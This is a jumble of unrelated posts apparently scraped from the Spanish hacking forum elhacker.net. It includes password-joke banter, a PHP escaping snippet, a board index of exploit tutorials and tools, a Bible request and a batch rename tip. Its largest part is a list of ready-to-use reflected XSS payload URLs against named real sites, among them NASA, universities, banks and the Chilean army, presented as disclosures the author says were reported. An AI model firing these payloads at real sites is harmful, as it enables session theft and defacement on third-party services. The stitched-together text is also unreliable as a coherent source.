Test Foro de elhacker.net SMF 2.1

Cita de: sirdarckcat en  9 Febrero 2009, 21:41 PM
de que hablas WHK, si claro todos saben que el password de el-brujo es amoalauraperoesperarehastaelmatrimonio..

http://www.bugmenot.com/view/foro.elhacker.net
(voten que si sirven!!)

Tambien sale la mia..

Saludos!!

jajajajjaja que risa el de anelkaos XD

Cita de: DProduct en  9 Febrero 2009, 20:44 PM
Si os cuento lo que me acaba de pasar....
Me metí en esta página para verla: https://www.google.com/a/elhacker.net/LoginAction2?service=CPanel
Entonces, metí en el primer cuadro "administrador", y en el segundo una contraseña, y.... ¡LOGIN! Creo que pronto va a haber otro admin al mando

No, no piensen mal de mí. Solo escribo esto para decirle a el-brujo que cambie la contraseña (porque esta es poco segura)

Cita de: Blink182 en  9 Febrero 2009, 21:05 PM
es cierto ya entre con la cuenta de el-brujo
jajajajaja

Mentira, diciendo esas tonteras después con que cara van a estar pidiendo que les regalen cuentas  , una cuenta de este dominio se gana con esfuerzo, dedicación y bocación por la seguridad informática y de esta comunidad no por quien postea mas o simplemente para mostrarselos a sus compañeros de estudios. Si alguien demuestra una ayuda o aporte que lo merezca de seguro lo obtendrá sin la necesidad de pedirlo y no copiando tutos o teniendo una mentalidad como hasta ahora, si alguien quiere una cuenta @elhacker.net piense que ha hecho para ganarsela, obiamente tampoco creo que se la den a gente que solo quiera abusar de el.

Las cuentas de este dominio están reservadas para aquellos que lo necesiten como los señores Wiki o gente del staff, personas que se lo merecen por torneos, pruebas, etc.

Recuerdo que la primera ves que me pusieron de colaborador lo fuí sin pedirlo porque una cosa es ayudar para ser staff y otra cosa es ayudar para que esto salga adelante y son dos motivaciones totalmente diferentes, a mi me gusta el tema de la informática en general y hasta ahora todo lo que he hecho lo hago desinteresadamente y no para tener estrellas ni cuentas ni un perfil que diga mod o colab, eso se obtiene debido a tu colaboración y/o empeño no y no el esforzarse para ser destacado o algo así. Las cosas que te dan acá son producto de lo que haces y no debes hacerlos para obtener esos pequeños detalles porque si fuera así entonces tus intenciones no son verdaderas y con eso ya tendrías una idea si realmente mereces esa cuenta o no.

return mysql_real_escape_string(stripslashes($string));
Mas corto y ya, con eso ya no te pueden joder con una sql inyeccion a menos que procese algun dato sin encerrarse en comillas o integrar integers sin filtrar (int)$val, todo depende de $string

CitarEstaria bien hacer un taller de buscar vulnerabilidades a SMF =P, a alguien le interesa?

A mi me interesa, es mas.. si vas a la sección de bugs en simplemachines podrás ver muchisimos bugs reportados que nunca aparecieron en ningún sitio de advisorie porque son muchos y los parches aparecen antes de ser expuestos y los que si son conocidos son los que se publican antes de ser parchado.

Lo mas recomendable en este caso es utilizar no-script como precaución mínima si es que tienes alguna cuenta de permisos elevados en un sistema web cualquiera como Administrador, moderador, publicador de noticias, etc y nunca navegar en tu sistema web con tu usuario logueado para evitar ataques aunque en este caso en especial el atacante puede enviarte el script de ataque por medio del privado forzando al administrador a estar logueado para visualizarlo.

CitarE-Sword-Biblia - Sofware Biblico en descarga directa

Ya lo tengo gracias de todas formas pero habia uno que si me interesaba pero ninguno tiene enlace de descarga 

Hola, cual es la biblia en español mas antigua que puedas encontrar? tengo una de Reina Valera de 1909, si puedes encontrar alguna que pudiera ser mas antigua por favor. Gracias.

Advisories

• Recopilatorio de Vulnerabilidades de XSS/SQLinjection
  
• OC4J Directory Traversal
  
• Falla en el mod Seo4SMF para SMF
  
• Múltiples fallas en Joomla 1.5.9 + PoC [Instalacion de una shell]
  
• Múltiples fallas en Joomla 1.5.10 + PoC [Instalacion de una shell]
  
• usa.kaspersky.com hacked ... full database acces , sql injection
  
• Vulnerabilidad XSS Universal en todos los Servicios Google
  
• CuteNews 1.4.6 Escalar privilegios (CSRF + Shell)
  
• Múltiples vulnerabilidades en Oscommerce 2.2 RC2a
  
• Múltiples vulnerabilidades en SqliteAdmin 1.2.0 (Ejecución de código)
  
• Utilizando Joomla 1.5 como servidor de correos masivos
  
• Falla universal en exploradores permite romper la seguridad de conecciónes mediante ssl (https)
  
• Múltiples inyecciones SQL en SMF <= 1.1.10 y 2.0 <= RC1.2
  
• XSS en Google Talk 1.0.0.105
  
• Vulnerabilidad XSS en tuenti
  
• XSS en goear.com
  
• XSS encontrado en fotolog.com
  
• Seria falla en IE8 hace que sitios 'seguros' sean inseguros
  
• Fede_cp y Castg! Simple disclosure de Fotolog.com
  
• Path Disclosure en mayoria de blogs WordPress
  
• Codigo de ejecución PHP y XSS en IPBoard 3.0.5
  
• Codigo de ejecución PHP en VBulletín 4.0.1 (bypass al filtro de funciones)
  
• XSS vBulletin 4.0.1 [admincalendar.php]
  
  Tutoriales y talleres
  
• Aprende con la práctica - Warzone de ElHacker.NET
  
• Gran tutorial sobre inyecciones sql en MySQL
  
• Taller de introduccion a los bugs a nivel web
  
• SQL Injection para principiantes, ejemplos en aplicaciones reales
  
• Ataques XSS
  
• Tutorial de Inyección SQL (SQL Injection)
  
• Los Poderes Secretos de XSS (Cross Site Scripting)
  
• Local/Remote File Inclusion
  
• Blind SQL Inyection Con Descarga Forzada
  
• Local JPG shell Inclusion
  
• Ejemplos de Remote File Inclusion
  
• Concepto práctico en la creación de un EXPLOIT para RCE mediante LFI 'caso real'
  
• Intrusion En Servidor Compartido En base a Injeccion SQL. (Caso Real)
  
• Optimización de SQL Union Injection en MYSQL
  
• Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]
  
• Otro Tip para Shells (Safe_Mode y Mod_Security) By Zero Bits
  
• Auditoría de seguridad hacia Simple Machines Forum 2.0
  
• Auditoría de seguridad hacia OpenCart 1.4.7
  
• DVWA Security (Discución sobre cada vulnerabilidad de este proyecto)
  
• Taller de introduccion a los bugs a nivel web
  
• Fragmentando código y saltando la limitación de characters (XSS)
  
  Proyectos
  
• YASBU 0.1 && BRute Order (SQL INJECTIONS TOOLS)
  
• Mass Mambo/joomla RFI Scanner
  
• XSS Scanner ver 1.3
  
• SQL Injection Tool
  
• Sql injection Helper version 2.0
  
• Conversión de Strings para inyección SQL (Códigos en diferentes lenguajes)
  
• [Tool][python] herramienta hecha por braulio23 para SQLi en mysql
  
• [python] Herramienta (bastante precaria) para XSS
  
• [Tool] SQLC (SQL Columnator)
  
• xassiz PanelFinder - by xassiz
  
  Concursos
  
• Hackea a Elhacker.net !
  
• Can You Hack? - PHPIDS
  
• Can You Hack? Bypass de filtros de XSS
  
  Otros
  
• Intrusiones desde Phpmyadmin
  
• Inyeccion SQL (mysql) dentro de un DELETE
  
• Inyeccion SQL (mysql) UPDATE dentro de un SELECT
  
• FQL Injection (Facebook Query Language)
  
• Vulnerabilidades en Expresiones Regulares
  
• Recopilación de herramientas para hacking web
  
  Prevención - Evitar ataques XSS e Inyecciones SQL
  
• Como evitar la inyeccion sql
  
• Prevenir SQL Injection ?
  
• Evitar XSS en eval() de ‭‬‭‬‭‬‭‬‭‬‭‬‭‬‭‬javascript
  
• PHP upload security
  
  Nota:
  Por favor, invito a todos para que puedan buscar en las demás páginas desde la 2 a la última la cual actualmente es la 5:
  http://foro.elhacker.net/nivel_web-b83.180/
  Ya que muchas veces la gente se queda en la primera página ignorando el contenido que tiene mas antiguedad pero son igual de interesantes y buenos.
  
  RSS (Noticias en tiempo real)
  Puedes agregar el RSS de este subforo a tu blog, web o lector de noticias desde este enlace:
  http://foro.elhacker.net/.xml.html;sa=news;board=83;limit=10;type=rss
  
  
  En actualización constante.

knap, no solo rfi, sino lfi, path disclosure o full path disclosure XD

Prueba esto mejor:

if(!@include(preg_replace('|[^A-Za-z0-9_]|i', '', $_POST['user']).'.php')){
echo 'No existe.';
}

Antes que nada hay que decir que todos los administradores de estos sitios webs fueron avisados de sus multiples fallas para que pudiesen ser corregidas antes de ser expuestas, solo un webmaster respondió y fue webtaller, el resto la mayoría los reparó solo en parte. esto es para tener un poco de consiencia al momento de crear un sitio web o manetener uno de que esto de la seguridad web no es algo para tomar a la ligera, antiguamente un xss era considerado de bajo riesgo pero con el tiempo ya se ha considerado medio alto dependiendo del caso ya que puedes no causar nada como la obtensión de privilegios de administración en los mismos sitios.

Ninguna web fue afectada.

Descubridor: todas por WHK.

La Nasa
http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS

La Nasa nuevamente
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

MTV
http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS

Defcon
https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E

Telefónica
http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL

Foros Terra
http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS

Descargas Terra
http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS

Simantec (de Norton Antivirus)
http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>

Esest (de Nod32 Antivirus)
http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )

Infosecurityevent
http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8

Megaupload
http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )

Winamp
http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>

Imageshack
http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

Webtaller
http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS

Universidad Surcolombiana (Colombia)
http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS

Universidad de Chile
http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS

Pontificia Universidad Católica de Chile
http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )

Universidad Iberoamericana de México
http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS

Universidad de Buenos Aires UBA (Argentina)
http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106

Universidade de São Paulo USP (Brasil)
http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS

Universidad Harvard (Estados Unidos)
https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )

Sourceforge
http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>

Softronic
http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>

WikiWix (Buscador Wikipedia)
http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es

Nintendo
http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all

Sony
http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true

Meanwhile
http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&

SPAM(1)
http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )

SPAM(3) (elhacker.org)
http://elhacker.org/ (en el buscador poner "><h1>XSS )

New-Bytes.net
http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )

Codebreak.tk
http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )

ElHacker.net
http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)

Dimitrix
http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )

Piojosoft
http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>

Portalhacker.net
http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")

DarkNet.org
http://www.darknet.org/ (metodo GET al input 's' :  ""><h1>XSS ")

BlindSec
http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)

johnny.ihackstuff
http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5

Las FARC
http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>

Universidad DUOC de Chile
http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E

Zone-H
http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5

Banco Santander
http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>

Anonymouse
http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>

Ejercito de Chile
http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0

Yahoo
http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D

Nota: las imagenes las retiré porque utilizaban demasiado espacio, ya las pondré nuevamente pero en miniaturas cuando estén listas.

Fuentes
http://www.jccharry.com/portada/component/content/article/51.html
http://xssed.com/archive/author=whk

O puedes usar esto:
set z=%time::=_%
ren archivo.csv bkp_"%date:/=-%"" ""%z:~0,8%".csv